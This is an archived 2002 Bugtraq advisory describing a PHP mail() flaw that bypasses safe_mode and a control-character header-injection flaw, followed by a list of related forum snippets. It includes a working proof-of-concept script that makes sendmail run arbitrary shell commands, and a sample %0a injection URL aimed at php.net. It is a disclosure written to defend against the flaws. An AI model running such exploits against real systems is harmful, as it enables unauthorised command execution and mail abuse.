PHP: Bypass safe_mode and inject ASCII control chars with mail()

From: Wojciech Purczynski (cliph@isec.pl)
Date: 08/23/02


Date: Fri, 23 Aug 2002 09:30:40 +0200 (CEST)
From: Wojciech Purczynski <cliph@isec.pl>
To: bugtraq@securityfocus.com


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Product: PHP
Version: 4.x up to 4.2.2
Vendor: http://www.php.net/
Author: Wojciech Purczynski <cliph@isec.pl>
Date: June 13, 2002
Updated: August 23, 2002
Released: August 21, 2002

Issue:
======

Two vulnerabilities exists in mail() PHP function. The first one allows to
execute any program/script bypassing safe_mode restriction, the second one
may give an open-relay script if mail() function is not carefully used in
PHP scripts.

Description:
============

PHP is a widely-used general-purpose scripting language that is especially
suited for Web development and can be embedded into HTML.

Details:
========

(1) Bypassing safe_mode restriction

If PHP is configured with safe_mode option enabled, special restriction
are set up including limit on external binaries that may be executed
from within a PHP script.

The 5th argument to the mail() function (introduced in version 4.0.5)
allow specifying command line option to the sendmail binary. Some time
ago a bug was found in the mail() function allowing to pass shell
meta-characters in the 5th argument, leading to execute arbitrary shell
commands or external binaries. This bug was fixed in version 4.1.0.

However, mail() function is still vulnerable because it allows to pass
command line arguments to the sendmail binary which gives the ability to
influence its behavior (i.e. by using non-default aliases, custom
configuration files - other cases are possible with others MTAs)

Passing 5th argument should be disabled if PHP is configured in safe_mode.

Exploit attached at the end.

(2) Injecting ASCII control characters into mail() arguments

Arbitrary ASCII control characters may be injected into string arguments
of mail() function. If mail() arguments are takeon from user's input it
may give the user ability to alter message content including mail
headers.

Example of such a vulnerability may be found on PHP.net site:

(URL wrapped for readability)
http://www.php.net/mailing-lists.php?
        maillist=your@email.com%0a&email=fake@from.net%0a

PHP should do content filtering before creating message body sent
with "sendmail -t" command.

Impact:
=======

(1) Any user may bypass safe_mode restrictions if mail() function is not
    disabled.
(2) Open-relay PHP script if user's data is poorly or not filtered and
    passed to the mail() function.

Exploit:
========

Sample exploit for (1) that works with sendmail MTA:

- -----8<----- bypass_safe_mode.php -----8<-----
<?
$script=tempnam("/tmp", "script");
$cf=tempnam("/tmp", "cf");

$fd = fopen($cf, "w");
fwrite($fd, "OQ/tmp
Sparse=0
R$*" . chr(9) . "$#local $@ $1 $: $1
Mlocal, P=/bin/sh, A=sh $script");
fclose($fd);

$fd = fopen($script, "w");
fwrite($fd, "rm -f $script $cf; ");
fwrite($fd, $cmd);
fclose($fd);

mail("nobody", "", "", "", "-C$cf");
?>
- -----8<----- bypass_safe_mode.php -----8<-----

Fix:
====

(1) has been successfully fixed in the latest CVS snapshot. Fix for the
(2) is not sufficient and it is still possible to inject ASCII control
characters that causes argument string to be truncated. Please refer to
the example URL mentioned above.

These bugs haven't been fixed yet in the latest 4.2.2 stable release.

- --
Wojciech Purczynski
iSEC Security Research
http://isec.pl/

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (GNU/Linux)
Comment: For info see http://www.gnupg.org

iD8DBQE9ZeSsC+8U3Z5wpu4RAsqBAKC04X7sCrcOQOXjpXgPqDXQjUEufgCfcokE
5n+9UMdQVqw1HYdh2opFsjY=
=iKiW
-----END PGP SIGNATURE-----



Relevant Pages

  • Re: IIS 6.0 on Windows Server 2003
    ... If PHP insists on using CMD.EXE to execute the shellcommand on the ... server, then no, you have no choice -- you must give read permissions to the ... this would be a security vulnerability caused by PHP. ...
    (microsoft.public.inetserver.misc)
  • Re: Sandbox
    ... has not been updated for seven years and will not compile with PHP ... development environment, anyway. ... the fly from the user's code then execute that page. ... Of course, and if there would be a shared host who would be prepared to do so much for a customer, I think I would switch to another safe one, for I think a shared host who does as all their customers want would have a lot of security issues. ...
    (comp.lang.php)
  • [UNIX] PHP Allows Bypassing of safe_mode And Injecting ASCII Control Chars With mail()
    ... PHP is a widely used general-purpose scripting language that is especially ... vulnerabilities exists in mailPHP function. ... within a PHP script. ... allow specifying command line option to the sendmail binary. ...
    (Securiteam)
  • Re: Function execution before page reload
    ... browser. ... Interaction between PHP and the browser is one-way - the PHP ... > In the short example above does the script execute the function BEFORE ... The server receives information from the browser and sends html back to the ...
    (comp.lang.php)
  • Re: Function execution before page reload
    ... if ){printf("Can't connect to MySQL Server. ... browser. ... Interaction between PHP and the browser is one-way - the PHP ... > In the short example above does the script execute the function BEFORE ...
    (comp.lang.php)